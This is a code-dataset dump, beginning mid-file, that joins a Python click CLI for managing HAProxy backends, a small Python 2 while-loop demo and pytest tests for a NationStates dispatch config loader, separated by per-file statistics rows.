'It reports the average HTTP request rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_httpErrRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average HTTP request error rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='10s',
required=False,
)
@click.option(
'--stickiness_bytesInRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming bytes rate over that period, in bytes per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='1m',
required=False,
)
@click.option(
'--stickiness_bytesOutRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average outgoing bytes rate over that period, in bytes per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default='1m',
required=False,
)
@click.option(
'--basicAuthEnabled/--no-basicAuthEnabled',
help='Enable HTTP basic authentication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--basicAuthUsers',
help='Basic auth users.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--basicAuthGroups',
help='Basic auth groups.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_timeoutConnect',
help=(
'Set the maximum time to wait for a connection attempt to a server to succeed. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_timeoutCheck',
help=(
'Sets an additional read timeout for running health checks on a server. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_timeoutServer',
help=(
'Set the maximum inactivity time on the server side. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_retries',
help=(
'Set the number of retries to perform on a server after a connection failure.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None,
required=False,
)
@click.option(
'--customOptions',
help=(
'These lines will be added to the HAProxy backend configuration.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_defaultserver',
help=(
'Default option for all server entries.'
),
show_default=True,
default=None,
required=False,
)
@click.option(
'--tuning_noport/--no-tuning_noport',
help=(
"Don't use port on server, use the same port as frontend receive. "
"If check enable, require port check in server."
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=True,
)
@click.option(
'--tuning_httpreuse',
help=(
'Declare how idle HTTP connections may be shared between requests.'
),
type=click.Choice(['', 'never', 'safe', 'aggressive', 'always']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default='safe',
required=False,
)
@click.option(
'--tuning_caching/--no-tuning_caching',
help=(
'Enable caching of responses from this backend. '
'The HAProxy cache must be enabled under Settings before this will have any effect.'
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=True,
required=False,
)
@click.option(
'--linkedActions',
help='Choose rules to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--linkedErrorfiles',
help='Choose error messages to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None,
required=False,
)
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default="result,validations",
show_default=True,
)
@pass_haproxy_backend_svc
def create(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Create a new backend
"""
json_payload = {
'backend': {
"enabled": kwargs['enabled'],
"name": kwargs['name'],
"description": kwargs['description'],
"mode": kwargs['mode'],
"algorithm": kwargs['algorithm'],
"random_draws": kwargs['random_draws'],
"proxyProtocol": kwargs['proxyprotocol'],
"linkedServers": kwargs['linkedservers'],
"linkedResolver": kwargs['linkedresolver'],
"resolverOpts": kwargs['resolveropts'],
"resolvePrefer": kwargs['resolveprefer'],
"source": kwargs['source'],
"healthCheckEnabled": kwargs['healthcheckenabled'],
"healthCheck": kwargs['healthcheck'],
"healthCheckLogStatus": kwargs['healthchecklogstatus'],
"checkInterval": kwargs['checkinterval'],
"checkDownInterval": kwargs['checkdowninterval'],
"healthCheckFall": kwargs['healthcheckfall'],
"healthCheckRise": kwargs['healthcheckrise'],
"linkedMailer": kwargs['linkedmailer'],
"http2Enabled": kwargs['http2enabled'],
"http2Enabled_nontls": kwargs['http2enabled_nontls'],
"ba_advertised_protocols": kwargs['ba_advertised_protocols'],
"persistence": kwargs['persistence'],
"persistence_cookiemode": kwargs['persistence_cookiemode'],
"persistence_cookiename": kwargs['persistence_cookiename'],
"persistence_stripquotes": kwargs['persistence_stripquotes'],
"stickiness_pattern": kwargs['stickiness_pattern'],
"stickiness_dataTypes": kwargs['stickiness_datatypes'],
"stickiness_expire": kwargs['stickiness_expire'],
"stickiness_size": kwargs['stickiness_size'],
"stickiness_cookiename": kwargs['stickiness_cookiename'],
"stickiness_cookielength": kwargs['stickiness_cookielength'],
"stickiness_connRatePeriod": kwargs['stickiness_connrateperiod'],
"stickiness_sessRatePeriod": kwargs['stickiness_sessrateperiod'],
"stickiness_httpReqRatePeriod": kwargs['stickiness_httpreqrateperiod'],
"stickiness_httpErrRatePeriod": kwargs['stickiness_httperrrateperiod'],
"stickiness_bytesInRatePeriod": kwargs['stickiness_bytesinrateperiod'],
"stickiness_bytesOutRatePeriod": kwargs['stickiness_bytesoutrateperiod'],
"basicAuthEnabled": kwargs['basicauthenabled'],
"basicAuthUsers": kwargs['basicauthusers'],
"basicAuthGroups": kwargs['basicauthgroups'],
"tuning_timeoutConnect": kwargs['tuning_timeoutconnect'],
"tuning_timeoutCheck": kwargs['tuning_timeoutcheck'],
"tuning_timeoutServer": kwargs['tuning_timeoutserver'],
"tuning_retries": kwargs['tuning_retries'],
"customOptions": kwargs['customoptions'],
"tuning_defaultserver": kwargs['tuning_defaultserver'],
"tuning_noport": kwargs['tuning_noport'],
"tuning_httpreuse": kwargs['tuning_httpreuse'],
"tuning_caching": kwargs['tuning_caching'],
"linkedActions": kwargs['linkedactions'],
"linkedErrorfiles": kwargs['linkederrorfiles'],
}
}
result = haproxy_backend_svc.create_backend(json_payload)
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@backend.command()
@click.argument('uuid')
@click.option(
'--enabled/--no-enabled',
help='Enable or disable this backend.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--name',
help='The name of the backend pool.',
show_default=True,
default=None
)
@click.option(
'--description',
help='Description for this backend pool.',
show_default=True,
default=None
)
@click.option(
'--mode',
help='Set the running mode or protocol of the backend pool.',
type=click.Choice(['http', 'tcp']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--algorithm',
help='Define the load balancing algorithm to be used in a backend pool.',
type=click.Choice(['source', 'roundrobin', 'static-rr', 'leastconn', 'uri', 'random']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--random_draws',
help=(
'When using the Random Balancing Algorithm, this value indicates the number of draws '
'before selecting the least loaded of these servers.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--proxyProtocol',
help='Enforces use of the PROXY protocol over any connection established to the configured servers.',
type=click.Choice(['', 'v1', 'v2']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--linkedServers',
help='Add servers to this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--linkedResolver',
help='Select the custom resolver configuration that should be used for all servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--resolverOpts',
help='Add resolver options.',
type=click.Choice(['', 'allow-dup-ip', 'ignore-weight', 'prevent-dup-ip']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--resolvePrefer',
help=(
'When DNS resolution is enabled for a server and multiple IP addresses from different families are returned, '
'HAProxy will prefer using an IP address from the selected family.'
),
type=click.Choice(['', 'ipv4', 'ipv6']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--source',
help='Sets the source address which will be used when connecting to the server(s).',
show_default=True,
default=None
)
@click.option(
'--healthCheckEnabled/--no-healthCheckEnabled',
help='Enable or disable health checking.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--healthCheck',
help='Select health check for servers in this backend.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--healthCheckLogStatus/--no-healthCheckLogStatus',
help='Enable to log health check status updates.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--checkInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on all configured servers. '
'This setting takes precedence over default values in health monitors and real servers.'
),
show_default=True,
default=None
)
@click.option(
'--checkDownInterval',
help=(
'Sets the interval (in milliseconds) for running health checks on a configured server when the server state '
'is DOWN. If it is not set HAProxy uses the check interval.'
),
show_default=True,
default=None
)
@click.option(
'--healthCheckFall',
help='The number of consecutive unsuccessful health checks before a server is considered as unavailable.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--healthCheckRise',
help='The number of consecutive successful health checks before a server is considered as available.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--linkedMailer',
help='Select an e-mail alert configuration. An e-mail is sent when the state of a server changes.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--http2Enabled/--no-http2Enabled',
help='Enable support for end-to-end HTTP/2 communication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--http2Enabled_nontls/--no-http2Enabled_nontls',
help='Enable support for HTTP/2 even if TLS is not enabled.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--ba_advertised_protocols',
help=(
'When using the TLS ALPN extension, HAProxy advertises the specified protocol list as supported on top of ALPN.'
' TLS must be enabled.'
),
type=click.Choice(['', 'h2', 'http11', 'http10']),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--persistence',
help=(
'Choose how HAProxy should track user-to-server mappings. '
'Stick-table persistence works with all protocols, but is broken in multi-process and multithreaded modes. '
'Cookie-based persistence only works with HTTP/HTTPS protocols.'
),
type=click.Choice(['', 'sticktable', 'cookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--persistence_cookiemode',
help=(
'Usually it is better to reuse an existing cookie. '
'In this case HAProxy prefixes the cookie with the required information.'
),
type=click.Choice(['piggyback', 'new']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--persistence_cookiename',
help='Cookie name to use for persistence.',
show_default=True,
default=None
)
@click.option(
'--persistence_stripquotes/--no-persistence_stripquotes',
help='Enable to automatically strip quotes from the cookie value.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--stickiness_pattern',
help='Choose a request pattern to associate a user to a server.',
type=click.Choice(['', 'sourceipv4', 'sourceipv6', 'cookievalue', 'rdpcookie']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--stickiness_dataTypes',
help=(
'This is used to store additional information in the stick-table. '
'It may be used by ACLs in order to control various criteria related to the activity of the client matching '
'the stick-table. Note that this directly impacts memory usage.'
),
type=click.Choice(
[
'', 'conn_cnt', 'conn_cur', 'conn_rate', 'sess_cnt', 'sess_rate', 'http_req_cnt', 'http_req_rate',
'http_err_cnt', 'http_err_rate', 'bytes_in_cnt', 'bytes_in_rate', 'bytes_out_cnt', 'bytes_out_rate'
]
),
multiple=True,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--stickiness_expire',
help=(
'This configures the maximum duration of an entry in the stick-table since it was last created, refreshed '
'or matched. The maximum duration is slightly above 24 days. Enter a number followed by one of the supported '
'suffixes "d" (days), "h" (hour), "m" (minute), "s" (seconds), "ms" (miliseconds).'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_size',
help=(
'This configures the maximum number of entries that can fit in the table. '
'This value directly impacts memory usage. '
'Count approximately 50 bytes per entry, plus the size of a string if any. '
'Enter a number followed by one of the supported suffixes "k", "m", "g".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_cookiename',
help='Cookie name to use for stick table.',
show_default=True,
default=None
)
@click.option(
'--stickiness_cookielength',
help='The maximum number of characters that will be stored in the stick table.',
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--stickiness_connRatePeriod',
help=(
'The length of the period over which the average is measured. It reports the average incoming connection rate '
'over that period, in connections per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_sessRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming session rate over that period, '
'in sessions per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_httpReqRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average HTTP request rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_httpErrRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average HTTP request error rate over that period, in requests per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_bytesInRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average incoming bytes rate over that period, in bytes per period. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--stickiness_bytesOutRatePeriod',
help=(
'The length of the period over which the average is measured. '
'It reports the average outgoing bytes rate over that period, in bytes per period. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--basicAuthEnabled/--no-basicAuthEnabled',
help='Enable HTTP basic authentication.',
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--basicAuthUsers',
help='Basic auth users.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--basicAuthGroups',
help='Basic auth groups.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--tuning_timeoutConnect',
help=(
'Set the maximum time to wait for a connection attempt to a server to succeed. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--tuning_timeoutCheck',
help=(
'Sets an additional read timeout for running health checks on a server. '
'Defaults to milliseconds. Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--tuning_timeoutServer',
help=(
'Set the maximum inactivity time on the server side. Defaults to milliseconds. '
'Optionally the unit may be specified as either "d", "h", "m", "s", "ms" or "us".'
),
show_default=True,
default=None
)
@click.option(
'--tuning_retries',
help=(
'Set the number of retries to perform on a server after a connection failure.'
),
show_default=True,
type=INT_OR_EMPTY,
callback=int_as_string,
default=None
)
@click.option(
'--customOptions',
help=(
'These lines will be added to the HAProxy backend configuration.'
),
show_default=True,
default=None
)
@click.option(
'--tuning_defaultserver',
help=(
'Default option for all server entries.'
),
show_default=True,
default=None
)
@click.option(
'--tuning_noport/--no-tuning_noport',
help=(
"Don't use port on server, use the same port as frontend receive. "
"If check enable, require port check in server."
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--tuning_httpreuse',
help=(
'Declare how idle HTTP connections may be shared between requests.'
),
type=click.Choice(['', 'never', 'safe', 'aggressive', 'always']),
multiple=False,
callback=tuple_to_csv,
show_default=True,
default=None
)
@click.option(
'--tuning_caching/--no-tuning_caching',
help=(
'Enable caching of responses from this backend. '
'The HAProxy cache must be enabled under Settings before this will have any effect.'
),
show_default=True,
is_flag=True,
callback=bool_as_string,
default=None
)
@click.option(
'--linkedActions',
help='Choose rules to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--linkedErrorfiles',
help='Choose error messages to be included in this backend pool.',
callback=resolve_linked_names_to_uuids,
show_default=True,
default=None
)
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default="result,validations",
show_default=True,
)
@pass_haproxy_backend_svc
def update(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Update a backend.
"""
json_payload = {
'backend': {}
}
options = [
'enabled', 'name', 'description', 'mode', 'algorithm', 'random_draws', 'proxyProtocol', 'linkedServers',
'linkedResolver', 'resolverOpts', 'resolvePrefer', 'source', 'healthCheckEnabled', 'healthCheck',
'healthCheckLogStatus', 'checkInterval', 'checkDownInterval', 'healthCheckFall', 'healthCheckRise',
'linkedMailer', 'http2Enabled', 'http2Enabled_nontls', 'ba_advertised_protocols', 'persistence',
'persistence_cookiemode', 'persistence_cookiename', 'persistence_stripquotes', 'stickiness_pattern',
'stickiness_dataTypes', 'stickiness_expire', 'stickiness_size', 'stickiness_cookiename',
'stickiness_cookielength', 'stickiness_connRatePeriod', 'stickiness_sessRatePeriod',
'stickiness_httpReqRatePeriod', 'stickiness_httpErrRatePeriod', 'stickiness_bytesInRatePeriod',
'stickiness_bytesOutRatePeriod', 'basicAuthEnabled', 'basicAuthUsers', 'basicAuthGroups',
'tuning_timeoutConnect', 'tuning_timeoutCheck', 'tuning_timeoutServer', 'tuning_retries', 'customOptions',
'tuning_defaultserver', 'tuning_noport', 'tuning_httpreuse', 'tuning_caching',
'linkedActions', 'linkedErrorfiles'
]
for option in options:
if kwargs[option.lower()] is not None:
json_payload['backend'][option] = kwargs[option.lower()]
result = haproxy_backend_svc.update_backend(kwargs['uuid'], json_payload)
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@backend.command()
@click.argument('uuid')
@click.option(
'--output', '-o',
help='Specifies the Output format.',
default="plain",
type=click.Choice(available_formats()),
callback=formatter_from_formatter_name,
show_default=True,
)
@click.option(
'--cols', '-c',
help='Which columns should be printed? Pass empty string (-c '') to show all columns',
default="result,validations",
show_default=True,
)
@pass_haproxy_backend_svc
def delete(haproxy_backend_svc: HaproxyBackendFacade, **kwargs):
"""
Delete backend
"""
result = haproxy_backend_svc.delete_backend(kwargs['uuid'])
CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
| 32.321285 | 121 | 0.671943 | 4,728 | 40,240 | 5.583333 | 0.093063 | 0.051254 | 0.064778 | 0.064172 | 0.875521 | 0.859194 | 0.855633 | 0.855633 | 0.853701 | 0.849837 | 0 | 0.002166 | 0.208424 | 40,240 | 1,244 | 122 | 32.347267 | 0.826578 | 0.003678 | 0 | 0.791045 | 0 | 0.019901 | 0.483588 | 0.087898 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004975 | false | 0.011609 | 0.006634 | 0 | 0.011609 | 0.004146 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2cd1c99742dba72284d6b228f1a5a0ac5e62e6da | 534 | py | Python | python/basis/4-while.py | weizhenwei/tech-docs-2016 | 253564a1633e9ec75ac94efede57f52c02b29280 | [
"BSD-2-Clause"
] | 3 | 2017-06-09T08:48:07.000Z | 2020-12-13T10:37:44.000Z | python/basis/4-while.py | weizhenwei/tech-docs-sharetome | 253564a1633e9ec75ac94efede57f52c02b29280 | [
"BSD-2-Clause"
] | null | null | null | python/basis/4-while.py | weizhenwei/tech-docs-sharetome | 253564a1633e9ec75ac94efede57f52c02b29280 | [
"BSD-2-Clause"
] | 4 | 2020-04-29T07:03:44.000Z | 2021-07-25T15:12:15.000Z | #!/usr/bin/env python
count = 0
while (count < 9):
print "The count is ", count
count = count + 1
count = 0
while (count < 9):
if (count % 2 == 0):
count = count + 1
continue
print "The count is ", count
count = count + 1
count = 0
while (count < 9):
if (count == 7):
break
print "The count is ", count
count = count + 1
count = 0
while (count < 9):
print "The count is ", count
count = count + 1
else:
print "The count is more than 9"
print "Good bye!"
| 14.052632 | 36 | 0.539326 | 79 | 534 | 3.64557 | 0.278481 | 0.3125 | 0.225694 | 0.260417 | 0.715278 | 0.715278 | 0.715278 | 0.715278 | 0.715278 | 0.715278 | 0 | 0.048295 | 0.340824 | 534 | 37 | 37 | 14.432432 | 0.769886 | 0.037453 | 0 | 0.708333 | 0 | 0 | 0.166341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.25 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
2ce1098ce8cf34e7de1ff6e89781b84fc82bab02 | 19,577 | py | Python | tests/test_file_dispatchloader.py | watarinishin/ns-dispatch-utility | 3acd0d4d985c3d9eda4e2242da3d32d874ec0e69 | [
"MIT"
] | 6 | 2021-11-16T14:45:27.000Z | 2022-03-04T17:30:02.000Z | tests/test_file_dispatchloader.py | watarinishin/ns-dispatch-utility | 3acd0d4d985c3d9eda4e2242da3d32d874ec0e69 | [
"MIT"
] | null | null | null | tests/test_file_dispatchloader.py | watarinishin/ns-dispatch-utility | 3acd0d4d985c3d9eda4e2242da3d32d874ec0e69 | [
"MIT"
] | null | null | null | import os
import json
import toml
import shutil
from unittest import mock
import pytest
from nsdu import exceptions
from nsdu.loaders import file_dispatchloader
class TestDispatchConfigManager():
def test_load_from_file_with_multiple_files(self, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '67890',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'},
'test3': {'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test4': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test5': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test6': {'ns_id': '54321',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
ins = file_dispatchloader.DispatchConfigManager()
file_1_path_str = str(dispatch_config_dir / 'dispatch_config_1.toml')
file_2_path_str = str(dispatch_config_dir / 'dispatch_config_2.toml')
ins.load_from_files([file_1_path_str, file_2_path_str])
assert ins.all_dispatch_config == {file_1_path_str: dispatch_config_1,
file_2_path_str: dispatch_config_2}
def test_load_from_file_with_an_non_existent_file(self, toml_files):
dispatch_config = {'nation1': {'test1': {'title':
'Test title 1',
'category': '1',
'subcategory': '100'}}}
file_path = toml_files({'dispatch_config.toml': dispatch_config})
ins = file_dispatchloader.DispatchConfigManager()
with pytest.raises(FileNotFoundError):
ins.load_from_files([str(file_path), 'abcd.toml'])
def test_get_canonical_dispatch_config(self):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'action': 'voodoo',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'}},
'nation2': {'test4': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test3': {'ns_id': '98765',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'action': 'remove',
'ns_id': '54321',
'title': 'Test title 5',
'category': '1',
'subcategory': '100'},
'test6': {'title': 'Test title 6',
'category': '1',
'subcategory': '100'},
'test7': {'action': 'remove',
'ns_id': '76543',
'title': 'Test title 7',
'category': '1',
'subcategory': '100'}}}
ins = file_dispatchloader.DispatchConfigManager()
ins.all_dispatch_config = {'config1.toml': dispatch_config_1,
'config2.toml': dispatch_config_2}
r = ins.get_canonical_dispatch_config()
expected = {'nation1': {'test1': {'action': 'edit',
'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'action': 'skip',
'title': 'Test title 2',
'category': '1',
'subcategory': '100'},
'test3': {'action': 'edit',
'ns_id': '98765',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test4': {'action': 'create',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'},
'test5': {'action': 'remove',
'ns_id': '54321',
'title': 'Test title 5',
'category': '1',
'subcategory': '100'},
'test6': {'action': 'create',
'title': 'Test title 6',
'category': '1',
'subcategory': '100'},
'test7': {'action': 'remove',
'ns_id': '76543',
'title': 'Test title 7',
'category': '1',
'subcategory': '100'}}}
assert r == expected
def test_save_after_add_new_dispatch_id_for_all_new_dispatches(self, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
ins = file_dispatchloader.DispatchConfigManager()
dispatch_config_file_1_path = dispatch_config_dir / 'dispatch_config_1.toml'
dispatch_config_file_2_path = dispatch_config_dir / 'dispatch_config_2.toml'
ins.load_from_files([str(dispatch_config_file_1_path), str(dispatch_config_file_2_path)])
ins.add_new_dispatch_id('test2', '23456')
ins.add_new_dispatch_id('test5', '54321')
ins.save()
expected_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '23456',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
expected_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'ns_id': '54321',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
assert toml.load(dispatch_config_file_1_path) == expected_1
assert toml.load(dispatch_config_file_2_path) == expected_2
def test_save_after_add_new_dispatch_id_for_only_one_new_dispatch(self, toml_files):
dispatch_config_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
dispatch_config_dir = toml_files({'dispatch_config_1.toml': dispatch_config_1,
'dispatch_config_2.toml':dispatch_config_2})
ins = file_dispatchloader.DispatchConfigManager()
dispatch_config_file_1_path = dispatch_config_dir / 'dispatch_config_1.toml'
dispatch_config_file_2_path = dispatch_config_dir / 'dispatch_config_2.toml'
ins.load_from_files([str(dispatch_config_file_1_path), str(dispatch_config_file_2_path)])
ins.add_new_dispatch_id('test2', '23456')
ins.save()
expected_1 = {'nation1': {'test1': {'ns_id': '12345',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'},
'test2': {'ns_id': '23456',
'title': 'Test title 3',
'category': '1',
'subcategory': '100'}},
'nation2': {'test3': {'ns_id': '12345',
'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
expected_2 = {'nation1': {'test4': {'ns_id': '98765',
'title': 'Test title 1',
'category': '1',
'subcategory': '100'}},
'nation2': {'test5': {'title': 'Test title 4',
'category': '1',
'subcategory': '100'}}}
assert toml.load(dispatch_config_file_1_path) == expected_1
assert toml.load(dispatch_config_file_2_path) == expected_2
class TestFileDispatchLoaderObj():
def test_get_dispatch_template(self, text_files):
template_path = text_files({'test1.txt': 'Test text 1', 'test2.txt': 'Test text 2'})
obj = file_dispatchloader.FileDispatchLoader(mock.Mock(), template_path, '.txt')
assert obj.get_dispatch_template('test1') == 'Test text 1'
def test_get_dispatch_template_with_non_existing_file(self, tmp_path):
obj = file_dispatchloader.FileDispatchLoader(mock.Mock(), tmp_path, '.txt')
assert obj.get_dispatch_template('test2') == None
